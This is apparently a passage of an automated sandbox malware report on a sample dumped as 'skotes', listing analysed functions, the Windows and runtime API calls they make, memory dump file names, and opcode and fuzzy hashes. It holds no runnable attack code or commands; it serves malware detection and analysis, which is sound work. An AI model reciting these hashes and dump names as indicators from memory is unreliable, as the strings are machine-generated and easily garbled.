                                                                                                                                              • Opcode Fuzzy Hash: 3f7075ae21071cbe051501ae2a10001984a94b7d474ad0fe30bab9cf7ce6c77b
                                                                                                                                              • Instruction Fuzzy Hash: F1D012387C0314B6F22002202C0BFA6AA209B0AF11F26484673483F0D081E8B04086AC
                                                                                                                                              APIs
                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408524
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoNativeSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1721193555-0
                                                                                                                                              • Opcode ID: 0de6832095093fdfe7075a4153fc6db1361a450ea81db82728210559b1eb16ab
                                                                                                                                              • Instruction ID: 8126d5e6d2798db8ff8b1aed180b41236615454edead62a88bb6e246a916662f
                                                                                                                                              • Opcode Fuzzy Hash: 0de6832095093fdfe7075a4153fc6db1361a450ea81db82728210559b1eb16ab
                                                                                                                                              • Instruction Fuzzy Hash: 5E511770D04218ABEB24EB68CE457DEB775DB46314F5042AEE844B72C1EF385EC48B99
                                                                                                                                              APIs
                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,0043705B,?,?,00000000,00000000), ref: 00437166
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Time$LocalSpecificSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2574697306-0
                                                                                                                                              • Opcode ID: 62e65f4d8da622eb70b14d9b15abd77cc87309fc1652166b095653a064e818f4
                                                                                                                                              • Instruction ID: 8b5364c4de45954e99c11eb84121b7b09905eacc119d0819985baf020b288db8
                                                                                                                                              • Opcode Fuzzy Hash: 62e65f4d8da622eb70b14d9b15abd77cc87309fc1652166b095653a064e818f4
                                                                                                                                              • Instruction Fuzzy Hash: 3A111FB390410CABDF10DE95C981EDF77BCAB0D310F605267E551E2280EA34EA55CB65
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __wsopen_s
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3347428461-0
                                                                                                                                              • Opcode ID: b179973e2016f215b0ef3759c58dae6fc3af94d4a8fe8fa67ffe374620a294ef
                                                                                                                                              • Instruction ID: a66abbd6648e96b8c426010f02d88ffd1877682ffd29169a79776235427ef3c3
                                                                                                                                              • Opcode Fuzzy Hash: b179973e2016f215b0ef3759c58dae6fc3af94d4a8fe8fa67ffe374620a294ef
                                                                                                                                              • Instruction Fuzzy Hash: 551118B1A0420AAFCB05DF59E94199B7BF4EF48304F04406AF805AB351D670DD21DB69
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0043A813,00000001,00000364,00000006,000000FF,?,0041D3FC,EBA58D57,?,00417A8B,?), ref: 0043D870
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: e90c3c68fccd56432ad74f1d09ad78c9aa3dc8d94c6bbb41a56103a8a651f705
                                                                                                                                              • Instruction ID: 98eadcf290edf2217396f0d342befbee2ed41839c936de3a1171de8bd0755ccb
                                                                                                                                              • Opcode Fuzzy Hash: e90c3c68fccd56432ad74f1d09ad78c9aa3dc8d94c6bbb41a56103a8a651f705
                                                                                                                                              • Instruction Fuzzy Hash: 29F05932D0112066EB283A33BC01A1B37599F4D770F25B027FC24A7280DA28FC0185E9
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,EBA58D57,?,?,0041D3FC,EBA58D57,?,00417A8B,?,?,?,?,?,?,00407465,?), ref: 0043B07E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: d3e579016960f99e7d79f40e1f5ad570ce8be35f6e5b82e7819322212163e863
                                                                                                                                              • Instruction ID: 3ea9c3d718554331966b1561a36c418539583e8fe2488c62c8fcceb8a8c22db2
                                                                                                                                              • Opcode Fuzzy Hash: d3e579016960f99e7d79f40e1f5ad570ce8be35f6e5b82e7819322212163e863
                                                                                                                                              • Instruction Fuzzy Hash: EAE0E53110121196E73432265C02B5FB668CB4D3A0F053213EFE4D2290EB58CC0081ED
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000000,?,00441B65,?,?,00000000,?,00441B65,00000000,0000000C), ref: 00441792
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                              • Opcode ID: a5753d576fc6fae96490bd3c9ae104ec3c996effb63c681812c4d41ae9142aa4
                                                                                                                                              • Instruction ID: fa30254bc092aafc69782497edfd86da6affdf9f63b9c805fd920c0f8d32bd5a
                                                                                                                                              • Opcode Fuzzy Hash: a5753d576fc6fae96490bd3c9ae104ec3c996effb63c681812c4d41ae9142aa4
                                                                                                                                              • Instruction Fuzzy Hash: AAD0923204110DBBDF129E85DC02EDA3BAAFB48754F014140BE1866020C736E831AB94
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420F16
                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420F62
                                                                                                                                                • Part of subcall function 0042265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00422750
                                                                                                                                              • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00420FCE
                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420FEA
                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042103E
                                                                                                                                              • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042106B
                                                                                                                                              • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004210C1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                                                              • String ID: (
                                                                                                                                              • API String ID: 2943730970-3887548279
                                                                                                                                              • Opcode ID: 425fb8cfbc370ada9ec3cceb94e7cd75aa984255e83a46ff21e6ba2db1915851
                                                                                                                                              • Instruction ID: d8c2f6391a379bc46cf5e5d5dc6ad3851f43131c5326ae158e38cbfcee68216d
                                                                                                                                              • Opcode Fuzzy Hash: 425fb8cfbc370ada9ec3cceb94e7cd75aa984255e83a46ff21e6ba2db1915851
                                                                                                                                              • Instruction Fuzzy Hash: 89B18BB0A00625EFCB28CF58E980A7AB7F4FF48700F51416EE905AB751D374A981CB99
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00422CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422D0F
                                                                                                                                              • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00421614
                                                                                                                                                • Part of subcall function 00422E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00422E39
                                                                                                                                                • Part of subcall function 00422E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00422EA8
                                                                                                                                              • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00421746
                                                                                                                                              • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 004217A6
                                                                                                                                              • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 004217B2
                                                                                                                                              • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 004217ED
                                                                                                                                              • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0042180E
                                                                                                                                              • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0042181A
                                                                                                                                              • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00421823
                                                                                                                                              • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0042183B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2508902052-0
                                                                                                                                              • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                              • Instruction ID: 90d9306956e5cc9bb6704af0189ae29657119f80b0b7e1970bf61bc55afc2ad7
                                                                                                                                              • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                              • Instruction Fuzzy Hash: FA818C71F00225AFCB18DFA9D580A6EB7F1FF98304B6542AED405A7711CB74AD42CB88
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042EC81
                                                                                                                                                • Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50
                                                                                                                                              • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0042ECE7
                                                                                                                                              • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0042ECFF
                                                                                                                                              • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0042ED0C
                                                                                                                                                • Part of subcall function 0042E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E7D7
                                                                                                                                                • Part of subcall function 0042E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E86F
                                                                                                                                                • Part of subcall function 0042E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E879
                                                                                                                                                • Part of subcall function 0042E7AF: Concurrency::location::_Assign.LIBCMT ref: 0042E8AD
                                                                                                                                                • Part of subcall function 0042E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E8B5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2363638799-0
                                                                                                                                              • Opcode ID: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
                                                                                                                                              • Instruction ID: 5e7ff754d2b343dc4c16742e0cc3e1cb9d27b644ec3e5e3051372794b2f11420
                                                                                                                                              • Opcode Fuzzy Hash: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
                                                                                                                                              • Instruction Fuzzy Hash: 8051E335B10225EBCF14DF52D885BAEB771AF44314F5540AAE9027B392CB78AE02CB95
                                                                                                                                              APIs
                                                                                                                                              • NtFlushProcessWriteBuffers.NTDLL ref: 0041CBAA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: BuffersFlushProcessWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2982998374-0
                                                                                                                                              • Opcode ID: 20c4ea3e2129b60a1e4d1eea87152ba57400039f21031a1d2e21638d1c4937de
                                                                                                                                              • Instruction ID: 734eec717fe04ada3b4bcf7b1b1ccceb46d859c39f6a646686bea7d52c1b0365
                                                                                                                                              • Opcode Fuzzy Hash: 20c4ea3e2129b60a1e4d1eea87152ba57400039f21031a1d2e21638d1c4937de
                                                                                                                                              • Instruction Fuzzy Hash: DFB09236A1B93047CA512B14BC4859E7714AA80B1270A01A6E805A72348A54AD828BDD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9aa71377ddf51d54108bd68bc2459ad0f115ceeb009950e0c4d0192850e4ba90
                                                                                                                                              • Instruction ID: 73b31feacec7ce9fe7b0550b3c6203be5604da4ad9e3037c20952e2b0bfc5a30
                                                                                                                                              • Opcode Fuzzy Hash: 9aa71377ddf51d54108bd68bc2459ad0f115ceeb009950e0c4d0192850e4ba90
                                                                                                                                              • Instruction Fuzzy Hash: E251B0B2D05B068BDB15CF58D8917AAB7F1FB48304F24856BC405EB350E3B8A980CF59
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004326E3
                                                                                                                                                • Part of subcall function 004324E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432504
                                                                                                                                              • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432704
                                                                                                                                              • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00432711
                                                                                                                                              • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0043275F
                                                                                                                                              • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 004327E6
                                                                                                                                              • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 004327F9
                                                                                                                                              • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00432846
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2530155754-0
                                                                                                                                              • Opcode ID: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
                                                                                                                                              • Instruction ID: fb03d83531a47042b93fe6564ff1c061b34d3f88821af197b1cf19dfef14ec32
                                                                                                                                              • Opcode Fuzzy Hash: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
                                                                                                                                              • Instruction Fuzzy Hash: 6B81C270900249ABDF169F54CA41BBF7BB1AF0D308F04509AEC4127352C7BA8D16DB65
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00432982
                                                                                                                                                • Part of subcall function 004324E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432504
                                                                                                                                              • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 004329A3
                                                                                                                                              • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 004329B0
                                                                                                                                              • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 004329FE
                                                                                                                                              • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00432AA6
                                                                                                                                              • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00432AD8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1256429809-0
                                                                                                                                              • Opcode ID: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
                                                                                                                                              • Instruction ID: 2c3f4ac1ddb9b2e884700b4006eb7aadb935b7841f65a9e333380771e6a1d96e
                                                                                                                                              • Opcode Fuzzy Hash: df65faca3598a56f4a1189fa951469fdc42dcddc43790275eedfd99cb695ca9a
